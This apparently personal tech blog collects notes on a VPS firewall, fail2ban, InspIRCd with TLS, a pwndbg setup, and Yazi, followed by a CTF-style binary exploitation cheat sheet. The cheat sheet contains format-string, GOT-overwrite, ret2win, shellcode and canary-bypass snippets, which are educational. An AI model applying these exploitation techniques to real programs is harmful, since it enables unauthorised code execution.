Hello Navi

Tech, Security & Personal Notes

VPS nftables Firewall With Docker

This note records a small nftables firewall setup for a VPS that also runs Docker.

The goal is not to write a clever universal ruleset. The goal is simpler: keep the host input path small, expose only the ports that should be public, and avoid fighting Docker's own NAT rules.

The example uses documentation IP addresses:

  • 203.0.113.10 as the admin's trusted IP
  • 198.51.100.20 as the server IP
  • 22222 as the SSH port

Replace them with your own values.

Basic Rules

Use the inet family so the same table can handle IPv4 and IPv6:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/sbin/nft -f

flush ruleset

table inet filter {
set trusted_ipv4 {
type ipv4_addr
flags interval
elements = {
203.0.113.10,
}
}

chain input {
type filter hook input priority filter; policy drop;

iif "lo" accept
ct state established,related accept
ct state invalid drop

ip protocol icmp accept
ip6 nexthdr icmpv6 accept

# SSH: only allow the trusted admin IP.
ip saddr @trusted_ipv4 tcp dport 22222 accept

# Public web entry.
tcp dport { 80, 443 } accept
}

chain forward {
type filter hook forward priority filter; policy accept;
}

chain output {
type filter hook output priority filter; policy accept;
}
}

Docker Notes

Docker manages its own forwarding and NAT rules. If you blindly flush everything and then set forward to drop, containers may lose network access or published ports may stop working.

For a small VPS, I usually keep the boundary simple:

  • protect the host through the input chain
  • let Docker manage container NAT
  • expose public services through Caddy on 80/443
  • bind internal app ports to 127.0.0.1 when possible

Example Docker port mapping:

1
2
ports:
- "127.0.0.1:8080:8080"

Then let Caddy publish it over HTTPS.

Apply Safely

Validate before loading:

1
sudo nft -c -f /etc/nftables.conf

Protect SSH With Fail2ban

Public SSH servers are constantly scanned and brute-forced. Changing the SSH port is not real security by itself, but it reduces background noise. fail2ban adds an actual defensive layer by watching failed login attempts and temporarily banning abusive IP addresses.

This note records a minimal setup for SSH protection with fail2ban and systemd logs.

Install Fail2ban

Arch Linux:

1
sudo pacman -S fail2ban

Debian/Ubuntu:

1
sudo apt install fail2ban

Enable the service:

1
sudo systemctl enable --now fail2ban

Optional: Change SSH Port

Edit the SSH daemon config:

1
sudo vim /etc/ssh/sshd_config

Set a non-default port. This article uses 22222 as an example; replace it with your own value.

1
Port 22222

Before restarting SSH, keep your current SSH session open. A bad config or firewall mistake can lock you out.

Validate the config:

1
sudo sshd -t

Restart SSH:

1
sudo systemctl restart sshd

Some distributions use ssh instead of sshd as the service name:

1
sudo systemctl restart ssh

Test login from another terminal before closing the old session:

1
ssh -p 22222 user@example.com

Configure Fail2ban For SSH

Create a local jail config instead of editing the packaged defaults:

1
sudo vim /etc/fail2ban/jail.d/sshd.local

Minimal config:

1
2
3
4
[sshd]
enabled = true
port = 22222
backend = systemd

If you keep SSH on the default port, use:

1
port = ssh

Restart fail2ban:

1
sudo systemctl restart fail2ban

Check Status

List enabled jails:

1
sudo fail2ban-client status

Check the SSH jail:

1
sudo fail2ban-client status sshd

View logs:

1
sudo journalctl -u fail2ban -e

On systems where fail2ban logs to a file:

1
sudo less /var/log/fail2ban.log

Unban An IP

If you accidentally ban yourself, unban the IP from another trusted session:

1
sudo fail2ban-client set sshd unbanip 203.0.113.10

203.0.113.10 is a documentation example address. Replace it with the real IP you need to unban.

Safer SSH Baseline

Fail2ban is only one layer. These SSH settings are usually worth enabling too:

1
2
3
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes

After changing SSH config, always validate and restart:

1
2
sudo sshd -t
sudo systemctl restart sshd

Notes

  • Do not rely on port changes as the only protection.
  • Prefer SSH keys over passwords.
  • Keep an existing SSH session open while changing SSH and firewall settings.
  • If a firewall is enabled, allow the SSH port before restarting SSH.
  • Use /etc/fail2ban/jail.d/*.local files for local overrides so package updates do not overwrite your changes.

InspIRCd IRC Server With TLS

This note records a minimal InspIRCd configuration for running a small IRC server with TLS support. The example exposes a plain client port on 6667 and a TLS client port on 6697.

The TLS setup uses the ssl_gnutls module and certificate files stored under /etc/inspircd/cert/.

Requirements

Install InspIRCd and make sure the GnuTLS SSL module is available:

1
sudo pacman -S inspircd

On Debian/Ubuntu-style systems, the package name may differ:

1
sudo apt install inspircd

You also need a certificate and private key. For a public domain, use Let's Encrypt or another ACME client. The config below expects:

1
2
/etc/inspircd/cert/fullchain.pem
/etc/inspircd/cert/privkey.pem

TLS Configuration

Add or adapt the following server, module, TLS profile, bind, admin, class, type, and oper blocks in your InspIRCd config.

Do not publish a real oper password. Generate a strong password or use InspIRCd's password hashing support if available in your setup.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<server
name="irc.example.com"
description="Example IRC Server"
network="ExampleNet"
>

<module name="ssl_gnutls">

<sslprofile
name="DefaultTLS"
provider="gnutls"
certfile="/etc/inspircd/cert/fullchain.pem"
keyfile="/etc/inspircd/cert/privkey.pem"
>

<bind address="" port="6667" type="clients">
<bind address="" port="6697" type="clients" ssl="DefaultTLS">

<admin
name="Example Admin"
nick="ExampleAdmin"
email="admin@example.com"
>

<class name="Class" commands="*" privs="*">
<type name="NetAdmin" classes="Class" modes="+s +c">

<oper
name="admin"
password="REPLACE_WITH_A_STRONG_PASSWORD_OR_HASH"
host="*@*"
type="NetAdmin"
>
</oper>

</type>
</class>
</admin>
</bind>
</bind>
</sslprofile>
</module>
</server>

Check The Config

Before restarting the service, run InspIRCd's config test if your package provides it:

1
sudo inspircd --configtest

If your package uses a different wrapper, check the service logs after restart:

1
2
3
4
systemctl restart inspircd
systemctl status inspircd
systemctl stop inspircd
journalctl -u inspircd -e

Connect

Plain IRC:

1
2
3
server: irc.example.com
port: 6667
TLS: off

TLS IRC:

1
2
3
server: irc.example.com
port: 6697
TLS: on

With WeeChat:

1
2
/server add examplenet irc.example.com/6697 -ssl
/connect examplenet

With irssi:

1
/connect -ssl irc.example.com 6697

Oper Login

After connecting as a normal user, authenticate as an IRC operator:

1
/OPER admin <password>

If login succeeds, the user receives the privileges from the configured NetAdmin type.

Notes

  • Use port 6697 for TLS clients. This is the common IRC-over-TLS port.
  • Keep 6667 only if you intentionally want to allow plaintext clients.
  • Restrict host="*@*" for real deployments. A narrower host mask is safer.
  • Avoid committing real passwords into blog posts, git repositories, or public config examples.
  • Prefer hashed oper passwords if your InspIRCd version and modules support them.

My Pwndbg GDB Init Setup

This is my current .gdbinit setup for binary exploitation and reverse engineering. It loads pwndbg, switches disassembly to Intel syntax, follows child processes after fork, and automatically opens separate tmux panes for disassembly, stack, backtrace, registers, and an IPython scratch pane.

Requirements

Install these first:

  • gdb
  • pwndbg
  • tmux
  • ipython optional, only used for the scratch pane

The config assumes pwndbg is installed at:

1
/usr/share/pwndbg/gdbinit.py

If your pwndbg install path is different, change the first line of the config.

Install

Put the following content in ~/.gdbinit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
source /usr/share/pwndbg/gdbinit.py
set history save on
set follow-fork-mode child
set disassembly-flavor intel

set $mybase1 = 0x0000555555554000
set $mybase = 0x7ffff7ffc000

python
import os
import atexit
import pwndbg
from pwndbg.commands.context import contextoutput

if 'TMUX' in os.environ:
created_panes = []

def create_pane(split_cmd):
output = os.popen(split_cmd).read().strip()
if not output: return None, None
pane_id, tty = output.split(":")
created_panes.append(pane_id)
return pane_id, tty

p_disasm_id, p_disasm_tty = create_pane('tmux split-window -vb -P -F "#{pane_id}:#{pane_tty}" -l 75% -d "cat -"')
p_stack_id, p_stack_tty = create_pane(f'tmux split-window -v -P -F "#{{pane_id}}:#{{pane_tty}}" -l 40% -t {p_disasm_id} -d "cat -"')
p_bt_id, p_bt_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -t -1 -l 30% -d "cat -"')
p_regs_id, p_regs_tty = create_pane(f'tmux split-window -h -P -F "#{{pane_id}}:#{{pane_tty}}" -t {p_stack_id} -l 30% -d "cat -"')
p_ipy_id, p_ipy_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -l 30% -d "ipython"')

if p_disasm_tty: contextoutput("disasm", p_disasm_tty, True, 'top', False)
if p_stack_tty: contextoutput("stack", p_stack_tty, True, 'top', False)
if p_bt_tty: contextoutput("backtrace", p_bt_tty, True, 'top', False)
if p_regs_tty: contextoutput("regs", p_regs_tty, True, 'top', False)

if p_stack_tty: contextoutput("legend", p_stack_tty, True)
if p_regs_tty: contextoutput("expressions", p_regs_tty, True, 'top', False)

def cleanup_panes():
for pid in created_panes:
os.system(f"tmux kill-pane -t {pid} >/dev/null 2>&1")

atexit.register(cleanup_panes)
else:
print("\n[\033[33m*\033[0m] Not running inside TMUX. Standard pwndbg output will be used.")

pwndbg.config.context_disasm_lines.value = 25
pwndbg.config.context_stack_lines.value = 18
end

Usage

Start a tmux session first:

1
tmux

Then run GDB or pwndbg normally:

1
gdb ./chall

or:

1
pwndbg ./chall

When GDB starts inside tmux, the config creates panes for:

  • disasm: current instruction context
  • stack: stack view plus pwndbg legend
  • backtrace: call stack
  • regs: registers and expressions
  • ipython: scratch Python shell

When GDB exits, the created tmux panes are killed automatically through the atexit cleanup hook.

If GDB is not running inside tmux, no panes are created and pwndbg falls back to the normal inline context output.

Important Lines

1
set history save on

Keeps GDB command history across sessions.

1
set follow-fork-mode child

After fork(), GDB follows the child process. This is useful for fork-based CTF services where the vulnerable logic runs in the child.

1
set disassembly-flavor intel

Uses Intel syntax instead of AT&T syntax.

1
2
pwndbg.config.context_disasm_lines.value = 25
pwndbg.config.context_stack_lines.value = 18

Controls how much disassembly and stack context pwndbg prints.

Base Address Helpers

These two lines are personal scratch variables:

1
2
set $mybase1 = 0x0000555555554000
set $mybase = 0x7ffff7ffc000

They are not required. I use them as quick base-address anchors while debugging PIE binaries or shared libraries. You can remove them or replace them with values from piebase, vmmap, or a leak.

Example usage:

1
2
x/10i $mybase1 + 0x1234
b *($mybase1 + 0x19e3)

Adjusting The Layout

The pane sizes are controlled by tmux split-window -l:

1
2
3
'tmux split-window -vb ... -l 75% ...'
'tmux split-window -v ... -l 40% ...'
'tmux split-window -h ... -l 30% ...'

Change these percentages if the panes are too large or too small for your monitor.

If you do not want the IPython pane, remove this line:

1
p_ipy_id, p_ipy_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -l 30% -d "ipython"')

Troubleshooting

If GDB prints Not running inside TMUX, start tmux first and launch GDB from inside it.

If pwndbg fails to load, verify the path:

1
ls /usr/share/pwndbg/gdbinit.py

If ipython fails, install it or remove the IPython pane line.

If the panes stay open after a crash, close them manually:

1
tmux kill-pane -t <pane_id>

Yazi File Manager Setup

Yazi is a terminal file manager written in Rust. It is fast, keyboard-driven, and works well as a lightweight replacement for opening a full GUI file manager when working inside a terminal or SSH session.

This note records a minimal Linux setup: install the standalone binary and add a shell wrapper so that exiting Yazi can change the current shell directory.

Installation

Download the latest musl build from the official release page:

1
wget https://github.com/sxyazi/yazi/releases/latest/download/yazi-x86_64-unknown-linux-musl.zip

Extract it:

1
2
unar yazi-x86_64-unknown-linux-musl.zip
cd yazi-x86_64-unknown-linux-musl

Install both binaries into a directory in $PATH:

1
sudo mv yazi ya /usr/local/bin/

Check that it works:

1
2
yazi --version
ya --version

Shell Wrapper

By default, a terminal file manager cannot directly change the parent shell's current directory. Yazi solves this by writing the final directory to a temporary file. A shell function can read that file after Yazi exits and then cd there.

Add this function to .bashrc, .zshrc, or the shell config you use:

1
2
3
4
5
6
7
function y() {
local tmp="$(mktemp -t "yazi-cwd.XXXXXX")" cwd
command yazi "$@" --cwd-file="$tmp"
IFS= read -r -d '' cwd < "$tmp"
[ "$cwd" != "$PWD" ] && [ -d "$cwd" ] && builtin cd -- "$cwd"
rm -f -- "$tmp"
}

Reload the shell configuration:

1
source ~/.zshrc

For Bash, use:

1
source ~/.bashrc

Now start Yazi with:

1
y

When you quit Yazi, the terminal will stay in the directory you were viewing.

Notes

  • yazi is the file manager itself.
  • ya is Yazi's helper command, used for package/plugin management and integrations.
  • The musl build is convenient because it is mostly self-contained and works on many Linux distributions.
  • If sudo mv fails, make sure /usr/local/bin exists and is included in $PATH.

Update

To update, download the latest release again and replace the old yazi and ya binaries:

1
2
3
4
wget https://github.com/sxyazi/yazi/releases/latest/download/yazi-x86_64-unknown-linux-musl.zip
unar yazi-x86_64-unknown-linux-musl.zip
cd yazi-x86_64-unknown-linux-musl
sudo mv yazi ya /usr/local/bin/

x86_64 Architecture & Stack

Byte Order & Packing

  • Most Linux CTF binaries on x86/x86_64 are little-endian: the least significant byte is stored at the lowest address.
  • 0x40123a packed as 64-bit little-endian becomes 3a 12 40 00 00 00 00 00.
  • This matters for partial overwrites: overflowing byte-by-byte overwrites the low bytes of a saved pointer first.
1
2
3
4
5
6
7
8
from pwn import *

p8(0x41) # b'A'
p16(0x1234) # b'4\x12'
p32(0xdeadbeef) # b'\xef\xbe\xad\xde'
p64(0x40123a) # b':\x12@\x00\x00\x00\x00\x00'

u64(leak.ljust(8, b'\x00'))

Registers

  • word = 2 bytes, dword = 4 bytes, qword = 8 bytes
  • RBP: frame/base pointer, RSP: stack pointer, RIP: instruction pointer.
  • Writing to 32-bit registers (e.g., EAX) automatically clears the upper 32 bits of the corresponding 64-bit register (RAX). xor EAX, EAX is equivalent to xor RAX, RAX but has a shorter encoding.

Memory access sizes:

1
2
3
4
mov [RAX], bl    ; 1 byte
mov [RAX], bx ; 2 bytes (word)
mov [RAX], ebx ; 4 bytes (dword)
mov [RAX], rbx ; 8 bytes (qword)

Calling Convention (SysV ABI)

  • Arguments: RDI, RSI, RDX, RCX, R8, R9.
  • Return Value: RAX (with RDX potentially holding high bits or extra data).
  • Syscall arguments: RDI, RSI, RDX, R10, R8, R9; syscall number in RAX.
  • RCX and R11 are clobbered by syscall.
  • x86_32: Arguments are passed via the stack in right-to-left order.
1
2
man syscall
grep -R "__NR_execve" /usr/include/asm* /usr/include/x86_64-linux-gnu/asm* 2>/dev/null

REX.W Prefix (0x48)

The REX prefix range is 0x40-0x4F (0100 WRXB), used to extend x86 instructions to 64-bit:

  • W: Set to 1 for 64-bit operations.
  • R, X, B: Extension for register addressing (R8-R15).

mov RDI, RSP requires a REX prefix with W=1 → 0100 1000 = 0x48.

Stack Frame Layout

  • RBP (Register): Points to the bottom of the current function stack frame. Local variables are accessed relative to it (e.g., [RBP - 0x10]).
  • saved RBP (Stack Data): A backup of the caller's RBP, used to restore the previous frame upon return.

Prologue & Epilogue

1
2
3
4
5
6
7
8
; Prologue (Entering Function B)
push RBP ; Save Caller A's RBP -> becomes saved RBP
mov RBP, RSP ; Establish B's stack frame

; Epilogue (Exiting Function B) - Equivalent to 'leave; ret'
mov RSP, RBP ; Clean up local variables
pop RBP ; Restore Caller A's RBP
ret ; Return to Caller A
1
2
3
4
5
6
7
8
9
10
11
High Addr  +-------------------------------+
| Caller's Stack Frame |
+-------------------------------+
| return address | ← call instruction auto-push
+-------------------------------+ ← reg RBP points here
| saved RBP | ← stores caller's RBP
+-------------------------------+
| local variables | ← accessed via [RBP - offset]
+-------------------------------+ ← reg RSP (stack top)
Low Addr | (unused) |
+-------------------------------+

Memory Management

Segments

  • .text: Executable code.
  • .data: Initialized global writable data.
  • .rodata: Read-only data (strings, constants).
  • .bss: Uninitialized global writable data.
  • stack: Local variables and function metadata.
  • heap: Dynamically allocated memory via malloc().

Viewing memory maps:

1
cat /proc/<pid>/maps

Von Neumann Architecture

In memory, bytes can represent either code or data; the CPU distinguishes them solely based on RIP. Bytes pointed to by RIP are executed as opcodes, while others accessed via pointers are treated as data.

Security Mitigations

Name Description
NX No-eXecute bit. Hardware-level page attribute marking memory pages as non-executable.
W^X Write XOR Execute. Memory is either writable or executable, never both simultaneously.
ASLR Address Space Layout Randomization. Randomizes memory layout at runtime.
PIE Position Independent Executable. Randomizes the binary base address.
canary Stack protector. Detects buffer overflow by checking a secret value before returning.

Checksec Reading

Mitigation Exploitation impact
No Canary Saved RIP overwrite is usually direct once the offset is known.
Canary Need leak, byte brute-force, non-return control flow, or write primitive that skips the canary.
NX disabled Stack/heap shellcode is viable if control can jump to it.
NX enabled Prefer ROP, ret2libc, mprotect, mmap, JOP/COP, or existing executable regions.
No PIE Binary code addresses are fixed, e.g. win() / gadgets / PLT have stable absolute addresses.
PIE enabled Need code pointer leak, PIE base recovery, or partial overwrite/brute force.
No RELRO GOT is writable and can be overwritten before/after resolution.
Partial RELRO .got.plt remains writable; lazy binding is still present.
Full RELRO GOT is read-only after startup; GOT overwrite is blocked.
SHSTK Intel CET shadow stack verifies returns; classic ret overwrite/ROP may fail.
IBT Intel CET indirect branch tracking requires indirect-call/jump targets to begin with endbr64.

checksec hints at the easiest path, but it is not a proof. A binary with executable stack may still be protected by SHSTK/IBT, input filters, unstable stack addresses, or non-return exits.

ELF & Dynamic Linking

  • ELF header: architecture, entry point, program headers.
  • Program headers: loader view; maps segments into memory (LOAD, GNU_STACK, GNU_RELRO).
  • Section headers: linker/debugger view; useful for .text, .plt, .got, .bss, symbols.
  • PLT: stubs in the binary used to call imported functions.
  • GOT: table of resolved function/data addresses.
  • Lazy binding: first PLT call jumps into the dynamic resolver, which writes the real libc address into GOT.
  • RELRO: controls whether relocation/GOT pages become read-only after relocation.
1
2
3
4
5
6
7
8
9
file ./chall
readelf -h ./chall
readelf -l ./chall
readelf -S ./chall
readelf -s ./chall
readelf -r ./chall # relocations / GOT targets
objdump -d ./chall | less
objdump -R ./chall # dynamic relocations
strings -a ./chall | less

Address Translation

  • VA: virtual address used at runtime.
  • RVA / offset inside module: runtime_addr - module_base.
  • File offset: byte offset in the ELF file; not always equal to RVA because segments have mapping alignment.

In a non-PIE ELF, .text often loads near 0x400000. In a PIE ELF, disassemblers may show offsets such as 0x1d08; runtime address is pie_base + 0x1d08.

1
2
3
4
piebase
breakrva 0x1d08
vmmap
xinfo 0x555555555d08

Binary Analysis & Tools

CLI Tools

1
2
3
4
5
6
7
8
9
file hello        # Identify arch, linking, stripped status
strip hello # Remove symbols
nm -a hello # Show symbol tables
checksec --file=hello
ltrace ./hello # Trace library calls
strace ./hello # Trace system calls
strings -a hello # Extract printable strings
readelf -a hello # ELF metadata
objdump -d hello # Disassembly

Reverse Engineering Workflow

  1. Identify: file, checksec, readelf -h, rabin2 -I.
  2. Triage strings/imports: strings, rabin2 -zz, rabin2 -i, IDA/Ghidra strings window.
  3. Find control points: main, parser loop, comparison branches, win, system, /bin/sh, open/read/write, strcmp, memcmp, printf.
  4. Recover input format: header magic, version, command/directive fields, length fields, endian, per-record size.
  5. Trace data flow: where user bytes land, how size is computed, where pointers are stored, whether data is copied, validated, freed, or printed.
  6. Convert checks into constraints: compare constants, printable-byte filters, checksums, jump tables, index math, bounds checks.
  7. Exploit mapping: choose leak/write/control-flow primitive that matches mitigations.

Useful questions while reversing:

  • Is the binary stripped? If not, start with symbols. If stripped, start with imports, strings, and cross-references.
  • Does the program return normally, call exit, or loop forever? Return-address hijacking only triggers on a return path.
  • Does a length check use signed or unsigned comparison? Which width: byte, word, dword, or qword?
  • Are there hidden repeat/backdoor paths that re-enter the vulnerable function before canary validation?
  • Does a parser use a switch/jump table? Can an out-of-range or special directive reach extra code?

radare2 Quick Reference

1
2
3
4
5
6
7
8
9
rax2 0x28                         # Hex/decimal conversion
rabin2 -I ./chall # Binary info
rabin2 -z ./chall # Data-section strings
rabin2 -zz ./chall # All strings
rabin2 -i ./chall # Imports
rabin2 -e ./chall # Entry points
r2 -A ./chall # Analyze and open
r2 -w ./chall # Open writable for patching
r2 -A -q -c "pdf @ main" ./chall # Non-interactive disassembly

Inside r2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
aaa             # Full analysis
afl # List functions
s main # Seek to symbol/address
s - # Seek back
pdf # Print current function
pdf @ sym.main # Print a function
pd 20 # Print 20 instructions
px 64 # Hexdump
iz # Strings in data sections
izz # Strings in whole binary
axt @ addr # Cross-references to address
axf @ addr # Cross-references from address
VV # Visual graph
wx 909090 # Patch raw bytes (requires -w)
wa nop # Assemble and patch instruction (requires -w)

Patching Notes

  • Patching data is safer than patching code when the target check compares constants or file-format bytes.
  • For code patches, inspect instruction length first; replacing a longer conditional branch with shorter bytes needs padding with nop.
  • In non-PIE ELF, runtime VA is often near file mapping base 0x400000; still convert VA to file offset using program headers or tooling instead of guessing.
1
2
3
rasm2 -a x86 -b 64 "nop"
rasm2 -a x86 -b 64 -d "90"
objdump -d -Mintel ./chall | less

Pwndbg

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
pwndbg /path/to/binary    # Launch
start # Break at main (fails if no main symbol)
starti # Break at first instruction (initialization code)
entry # Break at ELF entry point
info functions # List all analyzed function symbols
info frame # Show current stack frame
piebase # Show PIE base address
vmmap # Show memory layout (r-x, rw-, etc.)
breakrva 0x19e3 # Break at Relative Virtual Address (useful for PIE)
stack # Show stack
canary # Print and find canaries on the stack
context <section> # Show specific context window
checksec # Check for security features (NX, ASLR, PIE, Canary)
cyclic 100 # Generate 100-byte De Bruijn sequence
cyclic -l 0x6161616c # Find overflow offset using crash address
retaddr # Highlight return addresses in the current stack frame
rop # Simple ROP Gadget search
got # Show GOT state (resolved vs unresolved)
plt # View Procedure Linkage Table
heap # Overview of all heap chunks and their status
bins # View free lists (fastbins, unsorted, small, large, tcache)
arena # View detailed structure of the main arena (malloc_state)

p $rsp # Show current stack pointer
disass main # Disassemble 'main' function
break *main+123 # Breakpoint at main+123
Category Command
Stepping n (step over), s (step into), fin (finish), c (continue)
Breakpoints b *main+123, b <symbol>
Memory x/11s <addr>, hexdump <addr> 44, tele <addr>
Info context, vmmap, xinfo <addr>, checksec

my ~/.gdbinit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
source /usr/share/pwndbg/gdbinit.py
set history save on
set follow-fork-mode child
set disassembly-flavor intel

# may be useless
set $mybase1 = 0x0000555555554000
set $mybase = 0x7ffff7ffc000

python
import os
import atexit
import pwndbg
from pwndbg.commands.context import contextoutput

if 'TMUX' in os.environ:
created_panes = []

def create_pane(split_cmd):
output = os.popen(split_cmd).read().strip()
if not output: return None, None
pane_id, tty = output.split(":")
created_panes.append(pane_id)
return pane_id, tty

p_disasm_id, p_disasm_tty = create_pane('tmux split-window -vb -P -F "#{pane_id}:#{pane_tty}" -l 75% -d "cat -"')
p_stack_id, p_stack_tty = create_pane(f'tmux split-window -v -P -F "#{{pane_id}}:#{{pane_tty}}" -l 40% -t {p_disasm_id} -d "cat -"')
p_bt_id, p_bt_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -t -1 -l 30% -d "cat -"')
p_regs_id, p_regs_tty = create_pane(f'tmux split-window -h -P -F "#{{pane_id}}:#{{pane_tty}}" -t {p_stack_id} -l 30% -d "cat -"')
p_ipy_id, p_ipy_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -l 30% -d "ipython"')

if p_disasm_tty: contextoutput("disasm", p_disasm_tty, True, 'top', False)
if p_stack_tty: contextoutput("stack", p_stack_tty, True, 'top', False)
if p_bt_tty: contextoutput("backtrace", p_bt_tty, True, 'top', False)
if p_regs_tty: contextoutput("regs", p_regs_tty, True, 'top', False)

if p_stack_tty: contextoutput("legend", p_stack_tty, True)
if p_regs_tty: contextoutput("expressions", p_regs_tty, True, 'top', False)

def cleanup_panes():
for pid in created_panes:
os.system(f"tmux kill-pane -t {pid} >/dev/null 2>&1")

atexit.register(cleanup_panes)
else:
print("\n[\033[33m*\033[0m] Not running inside TMUX. Standard pwndbg output will be used.")

pwndbg.config.context_disasm_lines.value = 25
pwndbg.config.context_stack_lines.value = 18
end

pwntools

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
p = gdb.debug("./vuln", gdbscript="b *main+1\nc")
p.send(cyclic(123))
offset = cyclic_find(0x6161616a) # Finds 'jaaa'

import IPython
IPython.embed() # Launch IPython
# leak = u64(p.recvline(keepends=False).ljust(8, b'\x00'))

sc = asm(shellcraft.sh())
sc = asm(shellcraft.cat("/flag"))
sc = asm(shellcraft.chmod("/flag", 0o444))

View shellcraft:

1
2
3
pwn shellcraft -l
# Output format (default: hex), choose from {e}lf, {r}aw, {s}tring, {c}-style array, {h}ex string, hex{i}i, {a}ssembly code, {p}reprocessed code, escape{d} hex string
pwn shellcraft amd64.linux.sh -f d

De Bruijn Sequence (Cyclic)

A De Bruijn sequence \(B(k, n)\) is a cyclic sequence where every possible string of length \(n\) over an alphabet of size \(k\) appears exactly once.

  • Why it's used: When a binary crashes due to a buffer overflow, the RIP will be overwritten by a 4 or 8-byte chunk of the sequence. Since every chunk is unique, cyclic_find can instantly determine the exact offset needed for the exploit.

Crash-offset workflow:

1
2
3
4
5
6
7
8
9
10
from pwn import *

context.arch = "amd64"
p = process("./chall")
p.send(cyclic(300))
p.wait()

# In GDB/pwndbg, read overwritten RIP/RSP value, then:
offset = cyclic_find(0x6161616c) # 32-bit chunk
offset = cyclic_find(p64(0x6161616c6161616b), n=8)

For 64-bit patterns, keep n consistent between generation and lookup if you use non-default subsequence size.

Environment Control

  • Disable ASLR for Debugging: gdb disables ASLR by default. For a clean environment, use setarch x86_64 -R /bin/bash to spawn a shell where all child processes (excluding SUID) have ASLR disabled.
  • SUID Trap: gdb cannot disable ASLR for SUID binaries due to kernel security. Remove the SUID bit (chmod u-s) or copy the binary to a local directory before debugging.
  • Global ASLR Toggle: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space (Reset to 2 when finished).

Environment affects stack addresses. argv[0] length, environment variables, terminal, and pwntools launching mode can shift stack buffers. Use env={} in process() or add a NOP sled when stack shellcode depends on approximate addresses.

Information Disclosure Causes

String Termination Problems

C strings are null-terminated, meaning they lack length metadata and rely on a 0x00 byte to mark the end.

  • Missing Null byte: If a program reads exactly \(N\) bytes into an \(N\)-byte buffer (e.g., using read()), it won't append a null byte.
  • Disclosure: Functions like printf("%s") will continue reading past the buffer until they hit a null byte, potentially leaking adjacent sensitive data like a flag or canary.

Uninitialized Data (Stack Frame Reuse)

  • Frame Persistence: When a function returns, its stack frame is not cleared. The RSP simply moves back up.
  • Ghost Data: If a subsequent function call allocates a frame over the same memory area and fails to initialize its variables, it can read or "leak" the "ghost" data left by the previous function.

Compiler Backstabbing (Dead Store Elimination)

  • The Trap: A developer might use memset(buf, 0, size) to clear a sensitive flag before a function returns.
  • DSE: If the compiler (with -O2 or -O3) determines that buf is never accessed again before the function returns, it may "optimize out" the memset entirely, leaving the secret data on the stack. Use -fno-inline or specific memory barrier techniques to prevent this.

Format String Leaks

printf(user_input) treats user bytes as a format string. This can leak stack/register values and, with %n, write memory.

1
2
3
4
%p %p %p %p              # leak pointers
%lx.%lx.%lx # leak words
%7$sAAAA<addr> # read string from controlled address, offset depends on stack layout
%hn / %hhn / %n # write 2 / 1 / pointer-sized count

Pwntools helpers:

1
2
3
4
from pwn import *

offset = FmtStr(exec_fmt).offset
payload = fmtstr_payload(offset, {elf.got["printf"]: libc.sym["system"]})

Common path with writable GOT: leak a libc address, calculate libc.address, then overwrite printf@GOT/puts@GOT with system or an offset into win.

Memory Corruption Primitives

Stack Buffer Overflow

Typical offset calculation:

1
2
3
4
buf = rbp - 0x60
saved RBP = rbp
return address = rbp + 8
offset_to_ret = 0x60 + 8

Ret2win payload:

1
payload = b"A" * offset_to_ret + p64(elf.sym["win"])

If win_authed(token) checks a stack/local token, sometimes jump past the check instead of calling the function entry. This is an offset jump. Make sure the target instruction does not depend on skipped setup.

Canary Bypass Patterns

  • Direct leak: program prints past the canary because the input overwrote its leading \x00 terminator.
  • Residual stack leak: another function leaves a canary copy or secret in reused stack memory.
  • Recursive/retry path: trigger a path that re-enters vulnerable code before the outer canary is checked.
  • Fork brute-force: child crashes do not randomize parent canary; brute-force byte-by-byte.
  • Skip canary write zone: corrupt loop index, pointer, length, or destination so writes land after the canary.

Stack canary on amd64 usually has a null low byte. Leak reconstruction often looks like:

1
2
canary = u64(b"\x00" + leak7)
payload = flat(b"A" * off, canary, b"B" * 8, target)

Signedness & Integer Bugs

Danger pattern: check in signed arithmetic, use in unsigned API.

1
2
3
4
5
int size;
scanf("%d", &size);
if (size <= 64) {
read(0, buf, size); // size converted to size_t
}

-1 passes size <= 64, then becomes 0xffffffffffffffff as size_t.

Integer multiplication overflow:

1
2
uint32_t bytes = count * record_size;
if (bytes <= sizeof(buf)) read(0, buf, count * record_size);

If multiplication truncates before the check but the later copy/read uses the larger semantic size, bounds checks fail.

OOB Indexing

  • Negative index can read/write before an array.
  • Positive overlarge index can reach later locals, heap metadata, GOT, vtables, function pointers, or adjacent objects.
  • Convert byte distance to index by dividing by element size.
1
index = (target_addr - array_base) // element_size

Partial Pointer Overwrite

Partial overwrite changes only low bytes of a pointer. Useful when high bytes are stable due to page alignment or same mapping.

1
payload = b"A" * offset + p16(target_low_16)

This works best when source and destination are in the same module/stack/heap region or when only the low page offset must change.

GOT Overwrite

Requirements:

  • GOT target must be writable (No RELRO or sometimes Partial RELRO).
  • A write primitive reaches the target GOT entry.
  • The overwritten function is called after the overwrite.

Common targets:

  • printf@GOT -> system, then pass "/bin/sh" or a command string to printf.
  • puts@GOT -> win + offset, but avoid recursion if win itself calls puts first.

Heap Bug Classes

  • UAF: use a pointer after free; can become type confusion if the freed chunk is reallocated as another object.
  • Double free: same chunk inserted into a free list twice; allocator-dependent exploitability.
